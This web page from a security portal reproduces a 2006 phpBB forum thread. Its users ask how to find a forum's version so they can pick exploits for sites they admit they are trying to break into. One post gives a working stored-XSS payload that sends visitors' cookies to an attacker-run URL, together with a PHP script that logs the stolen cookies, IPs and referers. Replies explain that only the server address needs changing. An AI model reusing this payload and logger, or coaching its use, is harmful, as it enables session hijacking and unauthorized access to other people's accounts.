Waraxe IT Security Portal
Login or Register
September 13, 2026
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 405
Members: 0
Total: 405
Full disclosure
[0day-rubbish] Royal Server 5.04.50529.0 Local privilege escalation to LocalSystem on the execution path without credential override (7.2)
[0day-rubbish] core-admin 1.0.164 (build 16468) Systemic shell command injection via ineffective quote escaping (8.8)
[0day-rubbish] OP5 Monitor 9.20 Command injection surviving the CVE-2025-34115 patch (OPT-IN fix ineffective) (8.8)
[0day-rubbish] QuantaStor 6.8.3.018 Command injection in the alert-mail command via the smtpPassword field (8.8)
[0day-rubbish] SmarterMail 100.0.9693 (Build 9693) Antivirus command-line configuration executing as NT AUTHORITY\SYSTEM (7.2)
[0day-rubbish] Jitterbit Agent 12.8.1.6 (Docker jitterbit/agent:12.8.1.6) Unauthenticated SOAP with hard-coded credentials leading to OS command execution (9.8)
[0day-rubbish] Accurate Online Private Cloud on-prem (current) Unauthenticated Hessian deserialization leading to JNDI remote class loading (9.8)
[0day-rubbish] DBxtra .NET 13.1.1.0 Unauthenticated SOAP API to xp_cmdshell code execution (9.8)
**Subject:** CVE-2026-2035703: Tozed ZLT X300 5G CPE — Unauthenticated Remote Root Code Execution via TR-069 Command Injection (CVSS 9.8)
CVE-2026-52307: Stored XSS in 1CMS v5.6
HP Easy Start for macOS: CVE-2026-12554 / CVE-2026-12555 /CVE-2026-12556
Next.js 16.4.0-canary.13 Image Optimizer DNS Rebinding TOCTOU SSRF Still Exists
O-CMS 1.0.0 Authenticated OS Command Injection viaai_cli_script
Flextype v1.0.0-alpha.3 CMS registerShortcodes() Remote Code Execution via Attacker-Controlled File Inclusion
Flextype v1.0.0-alpha.3 Stored Fetch Shortcode Allows Server-Side Request Forgery
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpBB -> How to find out PHPBB version.
Post new topicReply to topic View previous topic :: View next topic
How to find out PHPBB version.
PostPosted: Fri Apr 07, 2006 12:31 pm Reply with quote
Bill324
Regular user
Regular user
Joined: Apr 07, 2006
Posts: 11




Ok, So I have the site I have the exploits but I dont know which to use.

How do I find out which version they have. Shocked
View user's profile Send private message
PostPosted: Fri Apr 07, 2006 12:33 pm Reply with quote
sljyro
Advanced user
Advanced user
Joined: Mar 23, 2006
Posts: 53




http://www.site.com/forum/docs/CHANGELOG.html

where 'site.com/forum' is the actual forum URL
View user's profile Send private message
PostPosted: Fri Apr 07, 2006 1:11 pm Reply with quote
Bill324
Regular user
Regular user
Joined: Apr 07, 2006
Posts: 11




Cheers man, works like a teapot.
View user's profile Send private message
PostPosted: Fri Apr 07, 2006 1:16 pm Reply with quote
Bill324
Regular user
Regular user
Joined: Apr 07, 2006
Posts: 11




Ok, Now this forum has a 2.0.18.

Therefore, I use this:

Quote:
<pre a=">" onmouseover='document.location="http://localhost/cookies.php?c="+document.cookie' b="<pre" >


cookies.php

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('log.txt', 'a'); //chmod 777 log.txt
fwrite($fp,
'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.' ');
fclose($fp);
?>


Could someone just tell me what bits I change.

Thanks. Very Happy
View user's profile Send private message
PostPosted: Fri Apr 07, 2006 2:27 pm Reply with quote
Aryan-Husky
Active user
Active user
Joined: Apr 03, 2006
Posts: 37




Check previous post, the only think to change is the location of your server, I also think your target phpBB needs to have html set to on.
View user's profile Send private message
PostPosted: Fri Apr 07, 2006 4:21 pm Reply with quote
Bill324
Regular user
Regular user
Joined: Apr 07, 2006
Posts: 11




Do I change the server to MY website or the 'enemys' website host.

If its the person im trying to hack, how do I get their server details? Shocked
View user's profile Send private message
PostPosted: Wed May 10, 2006 10:10 pm Reply with quote
BlaQ_PhoeniX
Regular user
Regular user
Joined: May 11, 2006
Posts: 5




sljyro wrote:
http://www.site.com/forum/docs/CHANGELOG.html

where 'site.com/forum' is the actual forum URL


This doesn't seem to work on the forum i'm trying to gain access to. Any1 have any other ideas besides this one, /docs/INSTALL.html?
View user's profile Send private message
PostPosted: Thu May 11, 2006 6:18 pm Reply with quote
sljyro
Advanced user
Advanced user
Joined: Mar 23, 2006
Posts: 53




well theres a flaw with that, the use might have updated the forum, but not the docs, which happens in many cases. so that way is never 100%.

if it doesnt work (and you are sure its a phpBB and putting the correct url), there's a possibility the user has moved/deleted the docs folder from the server.
View user's profile Send private message
PostPosted: Thu May 11, 2006 7:07 pm Reply with quote
BlaQ_PhoeniX
Regular user
Regular user
Joined: May 11, 2006
Posts: 5




Yeah, i'm sure i typed it correctly and it is a phpBB forum. I tried it on another site and it worked.

The site was revamped to a phpBB forum Jan this year so culd that determine what version they're running?
View user's profile Send private message
PostPosted: Thu May 11, 2006 10:20 pm Reply with quote
sljyro
Advanced user
Advanced user
Joined: Mar 23, 2006
Posts: 53




if its jan, could be a 2.0.18 or .19
View user's profile Send private message
PostPosted: Fri May 12, 2006 4:54 pm Reply with quote
BlaQ_PhoeniX
Regular user
Regular user
Joined: May 11, 2006
Posts: 5




Ah, thanx for da help dude.
View user's profile Send private message
PostPosted: Mon Jul 03, 2006 7:58 pm Reply with quote
superninja
Active user
Active user
Joined: Jul 03, 2006
Posts: 38




Where it says what version is? Embarassed
View user's profile Send private message
PostPosted: Mon Jul 03, 2006 9:51 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




superninja wrote:
Where it says what version is? Embarassed


Take a good look at changelog and you will see, what is the latest version, described Smile
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Jul 26, 2006 12:38 am Reply with quote
VanVip
Beginner
Beginner
Joined: Nov 21, 2005
Posts: 4




hey... my question is: how can i get the version if the URL is not like site.com/forum... it's 'site'.forump.com... i did: 'site'.forump.com/doc/CHANGELOG.html but it doesn't works... how can i get the version in forums like this ?
View user's profile Send private message
PostPosted: Thu Jul 27, 2006 12:40 pm Reply with quote
sljyro
Advanced user
Advanced user
Joined: Mar 23, 2006
Posts: 53




VanVip wrote:
hey... my question is: how can i get the version if the URL is not like site.com/forum... it's 'site'.forump.com... i did: 'site'.forump.com/doc/CHANGELOG.html but it doesn't works... how can i get the version in forums like this ?


try docs

and not doc
View user's profile Send private message
How to find out PHPBB version.
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



PCWizardHub - Helping you fix, build, and optimize your PC life
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.039 Seconds